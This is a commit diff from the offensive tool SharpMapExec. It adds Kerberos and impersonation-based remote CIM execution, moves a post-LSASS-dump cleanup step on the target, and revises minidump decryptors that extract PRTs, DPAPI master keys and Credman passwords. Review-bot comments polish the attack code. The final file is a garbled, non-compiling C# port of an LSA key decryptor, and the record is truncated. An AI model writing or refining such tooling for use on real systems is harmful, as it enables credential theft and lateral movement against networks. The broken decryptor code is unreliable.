Projects STRLCPY SharpMapExec Commits 888a3072
  • .vs/SharpMapExec/v16/.suo
    Binary file.
  • ■ ■ ■ ■ ■
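--- a/SharpMapExec/Args/Info.cs
+++ b/SharpMapExec/Args/Info.cs
@@ -10,6 +10,7 @@
 
 //Cim
 Console.WriteLine("\r\n --- Cim ---");
+Console.WriteLine(@" Need plaintext password or the /impersonate flag");
 Console.WriteLine(@" SharpMapExec.exe ntlm cim /user:USER /password:PASSWORD /computername:TARGET");
 Console.WriteLine("\n Available Cim modules");
 Console.WriteLine(@" /m:enable_winrm (Runs Enable-PSRemoting -Force)");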
  • ■ ■ ■ ■ ■
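--- a/SharpMapExec/Commands/NtlmCim.cs
+++ b/SharpMapExec/Commands/NtlmCim.cs
@@ -1,4 +1,6 @@
-using System;
+using Microsoft.Management.Infrastructure;
+using SharpMapExec.Lib;
+using System;
 using System.Collections.Generic;
 using System.IO;
 using static SharpMapExec.Helpers.SecurityContext;
@@ -137,13 +139,22 @@
 return;
 }
 
-if (password.Cleartext != null)
+if (flags.Contains("impersonate"))
+{
+foreach (string computername in computernames)
+{
+CimSession cimSession;
+cimSession = Cim.newSession(computername, "", "", "", true);
+Scan.CIM(cimSession, module);
+}
+}
+else if (password.Cleartext != null)
 {
 Lib.ntlm.Ntlm(user, domain, password, computernames, module, moduleargument, path, destination, flags, "cim");
 }
 else
 {
-Console.WriteLine("[-] Need clear-text password for cim");
+Console.WriteLine("[-] Need plaintext password or /impersonate for cim");
 return;
 }
 }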
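Review bot: The `CimSession` created in the new `impersonate` loop is never disposed, and nothing in the loop catches a failure from `Cim.newSession` or `Scan.CIM`, so an exception for one entry in `computernames` would end the whole run (inferred; neither callee body is in this hunk). `CimSession` is `IDisposable`, so `using (CimSession cimSession = Cim.newSession(computername, "", "", "", true)) { Scan.CIM(cimSession, module); }` releases it per host. The branch is tested before `password.Cleartext`, so a supplied `/user` and `/password` are silently ignored when the flag is present, and `moduleargument` is not passed on; a comment such as `// impersonate: session uses the process's current token; /user and /password are ignored` would make that explicit. The enclosing method starts above the hunk.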
  • ■ ■ ■ ■ ■ ■
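--- a/SharpMapExec/Commands/kerberosCim.cs
+++ b/SharpMapExec/Commands/kerberosCim.cs
@@ -0,0 +1,189 @@
+using Microsoft.Management.Infrastructure;
+using Rubeus;
+using SharpMapExec.Lib;
+using System;
+using System.Collections.Generic;
+using System.IO;
+
+namespace SharpMapExec.Commands
+{
+public class kerberosCim : ICommand
+{
+public static string CommandName => "kerberoscim";
+
+public void Execute(Dictionary<string, string> arguments)
+{
+string[] users = { };
+string domain = "";
+string path = "";
+string destination = "";
+string[] passwords = { };
+string[] hashes = { };
+string dc = "";
+string ticket = "";
+Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial;
+string[] computernames;
+string module = "";
+string moduleargument = "";
+List<string> flags = new List<string>();
+
+
+if (arguments.ContainsKey("/m"))
+{
+module = arguments["/m"];
+}
+if (arguments.ContainsKey("/module"))
+{
+module = arguments["/module"];
+}
+
+//
+if (arguments.ContainsKey("/user"))
+{
+if (File.Exists(arguments["/user"]))
+{
+users = File.ReadAllLines(arguments["/user"]);
+}
+else
+{
+string[] parts = arguments["/user"].Split('\\');
+if (parts.Length == 2)
+{
+domain = parts[0];
+users = parts[1].Split(',');
+}
+else
+{
+users = arguments["/user"].Split(',');
+}
+}
+}
+
+if (arguments.ContainsKey("/domain"))
+{
+domain = arguments["/domain"];
+}
+if (arguments.ContainsKey("/dc"))
+{
+dc = arguments["/dc"];
+}
+if (arguments.ContainsKey("/ticket"))
+{
+ticket = arguments["/ticket"];
+}
+
+if (arguments.ContainsKey("/computername"))
+{
+if (File.Exists(arguments["/computername"]))
+{
+computernames = File.ReadAllLines(arguments["/computername"]);
+}
+else
+{
+computernames = arguments["/computername"].Split(',');
+}
+}
+else
+{
+Console.WriteLine("[-] /computername must be supplied!");
+return;
+}
+
+if (arguments.ContainsKey("/encType"))
+{
+string encTypeString = encType.ToString().ToUpper();
+
+if (encTypeString.Equals("RC4") || encTypeString.Equals("NTLM"))
+{
+encType = Interop.KERB_ETYPE.rc4_hmac;
+}
+else if (encTypeString.Equals("AES128"))
+{
+encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
+}
+else if (encTypeString.Equals("AES256") || encTypeString.Equals("AES"))
+{
+encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
+}
+else if (encTypeString.Equals("DES"))
+{
+encType = Interop.KERB_ETYPE.des_cbc_md5;
+}
+}
+else
+encType = Interop.KERB_ETYPE.rc4_hmac;
+
+if (arguments.ContainsKey("/password"))
+{
+if (File.Exists(arguments["/password"]))
+passwords = File.ReadAllLines(arguments["/password"]);
+else
+passwords = arguments["/password"].Split(',');
+}
+else if (arguments.ContainsKey("/des"))
+{
+if (File.Exists(arguments["/des"]))
+hashes = File.ReadAllLines(arguments["/des"]);
+else
+hashes = arguments["/des"].Split(',');
+encType = Interop.KERB_ETYPE.des_cbc_md5;
+}
+else if (arguments.ContainsKey("/rc4"))
+{
+if (File.Exists(arguments["/rc4"]))
+hashes = File.ReadAllLines(arguments["/rc4"]);
+else
+hashes = arguments["/rc4"].Split(',');
+encType = Interop.KERB_ETYPE.rc4_hmac;
+}
+else if (arguments.ContainsKey("/ntlm"))
+{
+if (File.Exists(arguments["/ntlm"]))
+hashes = File.ReadAllLines(arguments["/ntlm"]);
+else
+hashes = arguments["/ntlm"].Split(',');
+encType = Interop.KERB_ETYPE.rc4_hmac;
+}
+else if (arguments.ContainsKey("/aes128"))
+{
+hashes = arguments["/aes128"].Split(',');
+encType = Interop.KERB_ETYPE.aes128_cts_hmac_sha1;
+}
+else if (arguments.ContainsKey("/aes256"))
+{
+hashes = arguments["/aes256"].Split(',');
+encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
+}
+
+if (users.Length == 0 && String.IsNullOrEmpty(ticket))
+{
+Console.WriteLine("\r\n[X] You must supply a user name!\r\n");
+return;
+}
+if (String.IsNullOrEmpty(domain) && String.IsNullOrEmpty(ticket))
+{
+Console.WriteLine("\r\n[X] You must supply a domain!\r\n");
+return;
+}
+
+if ((hashes.Length == 0 && passwords.Length == 0) && String.IsNullOrEmpty(ticket))
+{
+Console.WriteLine("\r\n[X] You must supply a /password , or a [/des|/rc4|/aes128|/aes256] hash!\r\n");
+return;
+}
+
+if (String.IsNullOrEmpty(ticket) && (!((encType == Interop.KERB_ETYPE.des_cbc_md5) || (encType == Interop.KERB_ETYPE.rc4_hmac) || (encType == Interop.KERB_ETYPE.aes128_cts_hmac_sha1) || (encType == Interop.KERB_ETYPE.aes256_cts_hmac_sha1))))
+{
+Console.WriteLine("\r\n[X] Only /des, /rc4, /aes128, and /aes256 are supported at this time.\r\n");
+return;
+}
+
+foreach (string computername in computernames)
+{
+CimSession cimSession;
+cimSession = Cim.newSession(computername, "", "", "", true);
+Scan.CIM(cimSession, module);
+}
+}
+}
+}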
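Review bot: The `/encType` branch never reads the argument: `string encTypeString = encType.ToString().ToUpper();` stringifies the initial `Interop.KERB_ETYPE.subkey_keymaterial`, so none of the `Equals` comparisons can match; it should read `arguments["/encType"].ToUpper()`. More broadly, `users`, `passwords`, `hashes`, `ticket`, `dc`, `path`, `destination`, `moduleargument` and `flags` are parsed or declared but never used in `Execute`. The final loop calls `Cim.newSession(computername, "", "", "", true)`, so the session is not built from the account named on the command line. The command should either reject the unused options or print which identity the session actually uses, so the operator and any audit trail agree. The `CimSession` in that loop is also never disposed; a `using` block per host would release it.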
  • ■ ■ ■ ■ ■
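--- a/SharpMapExec/Lib/Cim.cs
+++ b/SharpMapExec/Lib/Cim.cs
@@ -18,10 +18,9 @@
 public static CimSession newSession(string computername, string domain, string username, string password, bool impersonate = false)
 {
 CimSession cimSession;
-
 if (impersonate)
 {
-DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Default };
+DComSessionOptions options = new DComSessionOptions { Impersonation = ImpersonationType.Impersonate };
 cimSession = CimSession.Create(computername, options);
 }
 else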
  • ■ ■ ■ ■ ■ ■
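--- a/SharpMapExec/Lib/Reg32.cs
+++ b/SharpMapExec/Lib/Reg32.cs
@@ -60,9 +60,9 @@
 try
 {
 RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
-string value = (string)environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
+var value = environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
 environmentKey.Close();
-return value;
+return value.ToString();
 }
 catch (System.UnauthorizedAccessException e)
 {
@@ -161,7 +161,7 @@
 }
 
 string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
-Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
+Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
 
 if(value == "0")
 {
@@ -198,7 +198,7 @@
 }
 
 string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
-Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
+Console.WriteLine(" [*] {0} value: {1}", key.Key, value);
 
 }
 }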
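Review bot: `return value.ToString();` throws `NullReferenceException` when the value name does not exist, because `GetValue(keyName)` returns null for a missing name; the old `(string)` cast passed null through to the caller. `OpenSubKey(subKeyName)` likewise returns null for a missing key and is dereferenced on the same line. Only `UnauthorizedAccessException` is visibly caught (other handlers may follow below the hunk), and `environmentKey.Close()` is skipped whenever a line above it throws. `return value?.ToString();` keeps the previous null behaviour, and the callers shown only print `value` and compare it with `"0"`. Wrapping the base key in `using (RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername))` closes the remote handle on every path.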
  • ■ ■ ■ ■ ■ ■
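--- a/SharpMapExec/Lib/Wsman.cs
+++ b/SharpMapExec/Lib/Wsman.cs
@@ -407,18 +407,18 @@
 {
 Console.WriteLine("[-] Failed to Copy Lsass Dump File");
 }
+try
+{
+(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
+}
+catch
+{
+Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
+}
 }
 catch
 {
 Console.WriteLine("[-] Failed to Dump Lsass");
-}
-try
-{
-(Collection<PSObject> result2, Collection<ErrorRecord> errors2) = InvokeCommand(computer, String.Format("if(test-path {0}){{remove-item {0} -force}}", path), false, auth, scheme);
-}
-catch
-{
-Console.WriteLine(String.Format(" [-] Failed to delete {0}", path));
 }
 }
 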
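Review bot: `path` is interpolated unquoted into the remote command text in the moved `InvokeCommand(... String.Format("if(test-path {0}){{remove-item {0} -force}}", path) ...)` call, so a value containing spaces or PowerShell metacharacters changes what is executed on the remote side. Single-quote the argument and double any embedded quotes, e.g. `string quoted = "'" + path.Replace("'", "''") + "'";`, and format with `quoted`. `result2` and `errors2` are discarded, so the "Failed to delete" message appears only if `InvokeCommand` throws; if it reports remote failures through the `ErrorRecord` collection (its body is not in view) they go unreported. Both bare `catch` blocks also drop the exception; `catch (Exception e)` with `e.Message` in the output would show the cause. The enclosing method starts and ends outside the hunk.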
  • ■ ■ ■ ■ ■ ■
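--- a/SharpMapExec/Projects/MiniDump/Decryptor/Cloudap_.cs
+++ b/SharpMapExec/Projects/MiniDump/Decryptor/Cloudap_.cs
@@ -48,40 +48,41 @@
 byte[] prtBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.PRT), (int)cacheEntry.cbPRT);
 var DecryptedPRTBytes = BCrypt.DecryptCredentials(prtBytes, minidump.lsakeys);
 string PRT = Encoding.ASCII.GetString(DecryptedPRTBytes.Skip(25).ToArray());
-
 cloudapentry.PRT = PRT;
-}
 
-if (cacheEntry.toDetermine != 0)
-{
-byte[] cacheunkBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.toDetermine), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_UNK)));
-KIWI_CLOUDAP_CACHE_UNK cacheunk = ReadStruct<KIWI_CLOUDAP_CACHE_UNK>(cacheunkBytes);
-var DecryptedDpapiBytes = BCrypt.DecryptCredentials(cacheunk.unk, minidump.lsakeys);
+
+if (cacheEntry.toDetermine != 0)
+{
+byte[] cacheunkBytes = ReadBytes(minidump.fileBinaryReader, Rva2offset(minidump, (long)cacheEntry.toDetermine), Marshal.SizeOf(typeof(KIWI_CLOUDAP_CACHE_UNK)));
+KIWI_CLOUDAP_CACHE_UNK cacheunk = ReadStruct<KIWI_CLOUDAP_CACHE_UNK>(cacheunkBytes);
+var DecryptedDpapiBytes = BCrypt.DecryptCredentials(cacheunk.unk, minidump.lsakeys);
 
-string key_guid = cacheunk.guid.ToString();
-string dpapi_key = BitConverter.ToString(DecryptedDpapiBytes).Replace("-", "");
-string dpapi_key_sha1 = BCrypt.GetHashSHA1(DecryptedDpapiBytes);
+string key_guid = cacheunk.guid.ToString();
+string dpapi_key = BitConverter.ToString(DecryptedDpapiBytes).Replace("-", "");
+string dpapi_key_sha1 = BCrypt.GetHashSHA1(DecryptedDpapiBytes);
 
-cloudapentry.key_guid = key_guid;
-cloudapentry.dpapi_key = dpapi_key;
-cloudapentry.dpapi_key_sha = dpapi_key_sha1;
-}
+cloudapentry.key_guid = key_guid;
+cloudapentry.dpapi_key = dpapi_key;
+cloudapentry.dpapi_key_sha = dpapi_key_sha1;
+}
 
-var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
-if (currentlogon == null)
-{
-currentlogon = new Logon(luid)
+var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
+if (currentlogon == null)
 {
-//UserName = username,
-Cloudap = new List<Cloudap>()
-};
-currentlogon.Cloudap.Add(cloudapentry);
-minidump.logonlist.Add(currentlogon);
-}
-else
-{
-currentlogon.Cloudap = new List<Cloudap>();
-currentlogon.Cloudap.Add(cloudapentry);
+currentlogon = new Logon(luid)
+{
+//UserName = username,
+Cloudap = new List<Cloudap>()
+};
+currentlogon.Cloudap.Add(cloudapentry);
+minidump.logonlist.Add(currentlogon);
+//continue;
+}
+else
+{
+currentlogon.Cloudap = new List<Cloudap>();
+currentlogon.Cloudap.Add(cloudapentry);
+}
 }
 
 llCurrent = log.Flink;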
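Review bot: In the `else` branch, `currentlogon.Cloudap = new List<Cloudap>();` replaces whatever list the existing logon already holds, so a second cache entry for the same LUID discards the first; `currentlogon.Cloudap = currentlogon.Cloudap ?? new List<Cloudap>();` keeps earlier entries. The moved closing brace also appears to put the `toDetermine` block and the logon-list update inside the preceding `if`, whose header is above the hunk, so entries that skip that `if` are no longer recorded; a comment should state that this is intended. `DecryptedPRTBytes.Skip(25)` and the `(int)cacheEntry.cbPRT` length come from the dump file and are used without a bounds or sanity check. The stray `//continue;` should be removed.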
  • ■ ■ ■ ■ ■ ■
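--- a/SharpMapExec/Projects/MiniDump/Decryptor/Credman.cs
+++ b/SharpMapExec/Projects/MiniDump/Decryptor/Credman.cs
@@ -25,8 +25,8 @@
 minidump.fileBinaryReader.BaseStream.Seek(credmanMem, 0);
 var credmansetBytes = minidump.fileBinaryReader.ReadBytes(Marshal.SizeOf(template.list_entry));
 
-int list1offset = StructFieldOffset(typeof(KIWI_CREDMAN_SET_LIST_ENTRY), "list1");//bug
-long pList1 = BitConverter.ToInt64(credmansetBytes, list1offset);
+//int list1offset = StructFieldOffset(typeof(KIWI_CREDMAN_SET_LIST_ENTRY), "list1");//bug
+long pList1 = BitConverter.ToInt64(credmansetBytes, FieldOffset<KIWI_CREDMAN_SET_LIST_ENTRY>("list1"));
 long refer = pList1 + FieldOffset<KIWI_CREDMAN_LIST_STARTER>("start");
 
 minidump.fileBinaryReader.BaseStream.Seek(Rva2offset(minidump, pList1), 0);
@@ -41,11 +41,13 @@
 continue;
 
 llCurrent = pStart;
-llCurrent = llCurrent - FieldOffset<KIWI_CREDMAN_LIST_ENTRY>("Flink");
+
 
 do
 {
+llCurrent = llCurrent - FieldOffset<KIWI_CREDMAN_LIST_ENTRY>("Flink");
 llCurrent = Rva2offset(minidump, llCurrent);
+
 if (llCurrent == 0)
 continue;
 
@@ -94,12 +96,11 @@
 
 if (credmanentry.Password != null)
 {
-var currentlogon = minidump.logonlist.FirstOrDefault(x =>
-x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
+var currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
 if (currentlogon == null)
 {
 currentlogon = new Logon(luid);
-currentlogon.UserName = username;
+//currentlogon.UserName = username;
 currentlogon.Credman = new List<CredMan>();
 currentlogon.Credman.Add(credmanentry);
 minidump.logonlist.Add(currentlogon);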
  • ■ ■ ■ ■ ■ ■
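--- a/SharpMapExec/Projects/MiniDump/Decryptor/Dpapi_.cs
+++ b/SharpMapExec/Projects/MiniDump/Decryptor/Dpapi_.cs
@@ -19,8 +19,7 @@
 if (position == 0)
 continue;
 
-var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader,
-(position + template.first_entry_offset), minidump.sysinfo);
+var ptr_entry_loc = get_ptr_with_offset(minidump.fileBinaryReader, (position + template.first_entry_offset), minidump.sysinfo);
 long ptr_entry = ReadInt64(minidump.fileBinaryReader, (long)ptr_entry_loc);
 
 llcurrent = ptr_entry;
@@ -31,24 +30,22 @@
 
 dpapi.KIWI_MASTERKEY_CACHE_ENTRY dpapiEntry = ReadStruct<dpapi.KIWI_MASTERKEY_CACHE_ENTRY>(entryBytes);
 //PrintProperties(dpapiEntry);
-
-byte[] dec_masterkey = BCrypt.DecryptCredentials(dpapiEntry.key, minidump.lsakeys);
-Dpapi dpapi = new Dpapi();
-//dpapi.luid = $"{dpapiEntry.LogonId.HighPart}:{dpapiEntry.LogonId.LowPart}";
-dpapi.masterkey = BitConverter.ToString(dec_masterkey).Replace("-", "");
-dpapi.insertTime = $"{ToDateTime(dpapiEntry.insertTime):yyyy-MM-dd HH:mm:ss}";
-dpapi.key_size = dpapiEntry.keySize.ToString();
-dpapi.key_guid = dpapiEntry.KeyUid.ToString();
-dpapi.masterkey_sha = BCrypt.GetHashSHA1(dec_masterkey);
-
-Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == dpapiEntry.LogonId.HighPart && x.LogonId.LowPart == dpapiEntry.LogonId.LowPart);
 
 if (dpapiEntry.keySize > 1)
 {
-if (currentlogon == null)
+byte[] dec_masterkey = BCrypt.DecryptCredentials(dpapiEntry.key, minidump.lsakeys);
+Dpapi dpapi = new Dpapi();
+//dpapi.luid = $"{dpapiEntry.LogonId.HighPart}:{dpapiEntry.LogonId.LowPart}";
+dpapi.masterkey = BitConverter.ToString(dec_masterkey).Replace("-", "");
+dpapi.insertTime = $"{ToDateTime(dpapiEntry.insertTime):yyyy-MM-dd HH:mm:ss}";
+dpapi.key_size = dpapiEntry.keySize.ToString();
+dpapi.key_guid = dpapiEntry.KeyUid.ToString();
+dpapi.masterkey_sha = BCrypt.GetHashSHA1(dec_masterkey);
+
+Logon currentlogon = minidump.logonlist.FirstOrDefault(x => x.LogonId.HighPart == dpapiEntry.LogonId.HighPart && x.LogonId.LowPart == dpapiEntry.LogonId.LowPart);
+if (currentlogon == null && !dpapi.insertTime.Contains("1601-01-01"))
 {
 currentlogon = new Logon(dpapiEntry.LogonId);
-//currentlogon.UserName = username;
 currentlogon.Dpapi = new List<Dpapi>();
 currentlogon.Dpapi.Add(dpapi);
 minidump.logonlist.Add(currentlogon);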
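Review bot: `!dpapi.insertTime.Contains("1601-01-01")` detects an unset timestamp by substring-matching the formatted string, which ties the check to the format string and to whatever conversion `ToDateTime` performs; if that helper converts to local time, a zero value renders as 1600-12-31 in zones behind UTC and slips through. Testing the raw field instead, for example `dpapiEntry.insertTime != 0` if it is an integer FILETIME (its type is not visible here), states the intent directly. Combining the two tests in one `if` also means that a null `currentlogon` with a zero timestamp falls through to whatever follows; if that is an `else` that dereferences `currentlogon` (below the hunk), it will throw. Splitting the timestamp test into its own guard with `continue` would avoid that.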
  • ■ ■ ■ ■ ■ ■
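--- a/SharpMapExec/Projects/MiniDump/Decryptor/LogonSessions.cs
+++ b/SharpMapExec/Projects/MiniDump/Decryptor/LogonSessions.cs
@@ -158,9 +158,9 @@
 "CachedUnlock"
 };
 
-public static List<Logon> FindSessions(Program.MiniDump minidump, msv.MsvTemplate template)
+public static List<Logon> FindSessions(Program.MiniDump minidump, msv.MsvTemplate template, int ptr_entry_offset = 1)
 {
-//Minidump.PrintProperties(template);
+//PrintProperties(template);
 
 List<Logon> logonlist = new List<Logon>();
 List<long> offsetlist = new List<long>();
@@ -172,34 +172,52 @@
 return logonlist;
 }
 
-long logonSessionOffset = (long)get_ptr_with_offset(minidump.fileBinaryReader, (logonSessionListSignOffset + template.LogonSessionListCountOffset), minidump.sysinfo);
-int logonSessionListCount = ReadInt32(minidump.fileBinaryReader, logonSessionOffset);
+ulong logonSessionOffset = get_ptr_with_offset(minidump.fileBinaryReader, (logonSessionListSignOffset + template.LogonSessionListCountOffset), minidump.sysinfo);
+uint logonSessionListCount = ReadInt8(minidump.fileBinaryReader, (long)logonSessionOffset);
 
+//Console.WriteLine($"logonSessionOffset {(Int32)logonSessionOffset}");
 //Console.WriteLine($"Parsing {logonSessionListCount} logon sessions");
+
+long offset = logonSessionListSignOffset + template.first_entry_offset;
+long listMemOffset = ReadInt32(minidump.fileBinaryReader, logonSessionListSignOffset + template.first_entry_offset);
+long ptr_entry_loc = offset + sizeof(int) + listMemOffset;
+
 for (var i = 0; i < logonSessionListCount; i++)
 {
+long listentry;
+long entry_ptr;
+long pos;
 //Console.WriteLine($"Parsing session {i}");
-long offset = logonSessionListSignOffset + template.first_entry_offset;
-long listMemOffset = ReadInt32(minidump.fileBinaryReader, offset);
-long tmp_offset = (int)offset + sizeof(int) + (int)listMemOffset + (16 * i);
-var voffset = ReadInt64(minidump.fileBinaryReader, tmp_offset);
-long current = Rva2offset(minidump, voffset);
+
+entry_ptr = ptr_entry_loc + (16 * i);
+listentry = ReadInt64(minidump.fileBinaryReader, entry_ptr);
+//offsetlist.Add(listentry);
+if (entry_ptr == listentry)
+continue;
+
+pos = entry_ptr;
 
+int count = 0;
 do
 {
-long listentry = ReadInt64(minidump.fileBinaryReader, current);
-listentry = Rva2offset(minidump, listentry);
+listentry = Rva2offset(minidump, ReadInt64(minidump.fileBinaryReader, pos));
+//Console.WriteLine($"listentry {listentry}");
+
+count++;
+if (count >= 255)
+return null;
 
 if (listentry == 0)
 break;
-if (offsetlist.Contains((listentry + template.LocallyUniqueIdentifierOffset)))
+
+if (offsetlist.Contains((listentry)))
 {
 break;
 }
+offsetlist.Add(listentry);
+
 
 KIWI_BASIC_SECURITY_LOGON_SESSION_DATA logonsession = new KIWI_BASIC_SECURITY_LOGON_SESSION_DATA();
-
-offsetlist.Add(listentry + template.LocallyUniqueIdentifierOffset);
 logonsession.LogonId = listentry + template.LocallyUniqueIdentifierOffset;
 logonsession.LogonType = ReadInt32(minidump.fileBinaryReader, listentry + template.LogonTypeOffset);
 logonsession.Session = ReadInt32(minidump.fileBinaryReader, listentry + template.SessionOffset);
@@ -244,9 +262,8 @@
 //Console.WriteLine("session " + logon.Session + " luid " + logon.LogonId.LowPart + " username " + logon.UserName + " pCredentials " + logonsession.pCredentials);
 //PrintProperties(logon);
 logonlist.Add(logon);
-
-voffset = ReadInt64(minidump.fileBinaryReader, listentry);
-current = Rva2offset(minidump, voffset);
+pos = Rva2offset(minidump, ReadInt64(minidump.fileBinaryReader, pos));
+//Console.WriteLine(pos);
 } while (true);
 }
 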
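Review bot: `if (count >= 255) return null;` makes `FindSessions` return null where the other visible exit returns `logonlist`, which throws away sessions already parsed and gives any caller that enumerates the result a `NullReferenceException`. `break;` or `return logonlist;` keeps the loop guard without changing the return contract. The list count is now read with `ReadInt8` into a `uint`, so only one byte of the stored count is honoured; a comment should explain why one byte is right for the templates in use. The new parameter `ptr_entry_offset = 1` is not referenced in the lines shown. `ptr_entry_loc + (16 * i)` and the offsets read from the file feed later reads with no check against the stream length, so a truncated or malformed dump will surface as an unhandled I/O exception rather than a clean stop.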
  • ■ ■ ■ ■ ■ ■
    SharpMapExec/Projects/MiniDump/Decryptor/lsadecryptor_lsa_decryptor_nt5.cs
     1 +using System;
     2 + 
     3 +using System.Linq;
     4 + 
     5 +namespace Minidump.Decryptor
     6 +{
     7 + 
     8 + public class LsaDecryptor_NT5
     9 + 
     10 + public object decryptor_template;
     11 +
     12 + public object des_key;
     13 +
     14 + public object feedback;
     15 +
     16 + public object feedback_offset;
     17 +
     18 + public object random_key;
     19 +
     20 + public LsaDecryptor_NT5(object reader, object decryptor_template, object sysinfo)
     21 + : base(null, sysinfo, reader) {
     22 + decryptor_template = decryptor_template;
     23 + feedback;
     24 + feedback_offset;
     25 + des_key;
     26 + random_key;
     27 + acquire_crypto_material();
     28 + }
     29 +
     30 + public virtual object acquire_crypto_material() {
     31 + Console.WriteLine("Acquireing crypto stuff...");
     32 + var sigpos = find_signature();
     33 + reader.move(sigpos);
     34 + //data = self.reader.peek(0x50)
     35 + //self.Console.WriteLine('Memory looks like this around the signature\n%s' % hexdump(data, start = sigpos))
     36 + foreach (var x in new List<object> {
     37 + decryptor_template.feedback_ptr_offset,
     38 + decryptor_template.old_feedback_offset
     39 + }) {
     40 + feedback_offset = x;
     41 + try {
     42 + feedback = get_feedback(sigpos);
     43 + //self.Console.WriteLine('Feedback bytes:\n%s' % hexdump(self.feedback, start = 0))
     44 + des_key = get_key(sigpos);
     45 + random_key = get_random(sigpos);
     46 + //self.Console.WriteLine('randomkey bytes:\n%s' % hexdump(self.random_key, start = 0))
     47 + } catch {
     48 + traceback.print_exc();
     49 + input();
     50 + }
     51 + }
     52 + }
     53 +
     54 + public virtual object get_feedback(object sigpos) {
     55 + if (decryptor_template.arch == "x86") {
     56 + var new_ptr = reader.get_ptr_with_offset(sigpos + feedback_offset);
     57 + reader.move(new_ptr);
     58 + return reader.read(8);
     59 + } else {
     60 + reader.move(sigpos + feedback_offset);
     61 + var offset = LONG(reader).value;
     62 + var newpos = sigpos + feedback_offset + 4 + offset;
     63 + reader.move(newpos);
     64 + return reader.read(8);
     65 + }
     66 + }
     67 +
     68 + public virtual object get_key(object sigpos) {
     69 + object des_key;
     70 + object des_key_ptr;
     71 + if (decryptor_template.arch == "x86") {
     72 + var new_ptr = reader.get_ptr_with_offset(sigpos + decryptor_template.desx_key_ptr_offset);
     73 + reader.move(new_ptr);
     74 + des_key_ptr = decryptor_template.key_struct_ptr(reader);
     75 + des_key = des_key_ptr.read(reader);
     76 + } else {
     77 + reader.move(sigpos + decryptor_template.desx_key_ptr_offset);
     78 + var offset = LONG(reader).value;
     79 + var newpos = sigpos + decryptor_template.desx_key_ptr_offset + 4 + offset;
     80 + reader.move(newpos);
     81 + des_key_ptr = decryptor_template.key_struct_ptr(reader);
     82 + des_key = des_key_ptr.read(reader);
     83 + }
     84 + return des_key;
     85 + }
     86 +
     87 + public virtual object get_random(object sigpos) {
     88 + if (decryptor_template.arch == "x86") {
     89 + var random_key_ptr = reader.get_ptr_with_offset(sigpos + decryptor_template.randomkey_ptr_offset);
     90 + random_key_ptr = reader.get_ptr_with_offset(random_key_ptr);
     91 + reader.move(random_key_ptr);
     92 + } else {
     93 + reader.move(sigpos + decryptor_template.randomkey_ptr_offset);
     94 + var offset = LONG(reader).value;
     95 + var newpos = sigpos + decryptor_template.desx_key_ptr_offset + 4 + offset;
     96 + reader.move(newpos);
     97 + }
     98 + return reader.read(256);
     99 + }
     100 +
     101 + public virtual object find_signature() {
     102 + Console.WriteLine("Looking for main struct signature in memory...");
     103 + var fl = reader.find_in_module("lsasrv.dll", decryptor_template.signature);
     104 + if (fl.Count == 0) {
     105 + logging.debug(String.Format("signature not found! %s", decryptor_template.signature.hex()));
     106 + throw new Exception("LSA signature not found!");
     107 + }
     108 + Console.WriteLine(String.Format("Found candidates on the following positions: %s", " ".join(from x in fl
     109 + select hex(x))));
     110 + Console.WriteLine(String.Format("Selecting first one @ 0x%08x", fl[0]));
     111 + return fl[0];
     112 + }
     113 +
     114 + public virtual object decrypt(object encrypted) {
     115 + // TODO: NT version specific, move from here in subclasses.
     116 + var cleartext = new byte[] { };
     117 + var size = encrypted.Count;
     118 + if (size) {
     119 + if (size % 8 != 0) {
     120 + var ctx = RC4(random_key);
     121 + cleartext = ctx.decrypt(encrypted);
     122 + } else {
     123 + //print('Decryption not implemented!')
     124 + cleartext = @__desx_decrypt(encrypted);
     125 + //raise Exception('Not implemented!')
     126 + }
     127 + }
     128 + return cleartext;
     129 + }
     130 +
     131 + public virtual object dump() {
     132 + Console.WriteLine("Recovered LSA encryption keys\n");
     133 + Console.WriteLine("Feedback ({}): {}".format(feedback.Count, feedback.hex()));
     134 + Console.WriteLine("Random Key ({}): {}".format(random_key.Count, random_key.hex()));
     135 + Console.WriteLine("DESX inputwhitening Key ({}): {}".format(des_key.inputWhitening.Count, des_key.inputWhitening.hex()));
     136 + Console.WriteLine("DESX outputwhitening Key ({}): {}".format(des_key.outputWhitening.Count, des_key.outputWhitening.hex()));
     137 + //self.Console.WriteLine('DESX DES Expanded Key ({}): {}' % (self.des_key.desKey.roundKey))
     138 + }
     139 +
     140 + public virtual void @__desx_decrypt_internal_block(object chunk) {
     141 + chunk = xor(chunk, des_key.outputWhitening);
     142 + chunk = @__desx_internal_block(chunk, encrypt: false);
     143 + chunk = xor(chunk, des_key.inputWhitening);
     144 + return chunk;
     145 + }
     146 +
     147 + public virtual object @__desx_decrypt(object data) {
     148 + var res = new byte[] { };
     149 + var i = 0;
     150 + var IV = feedback;
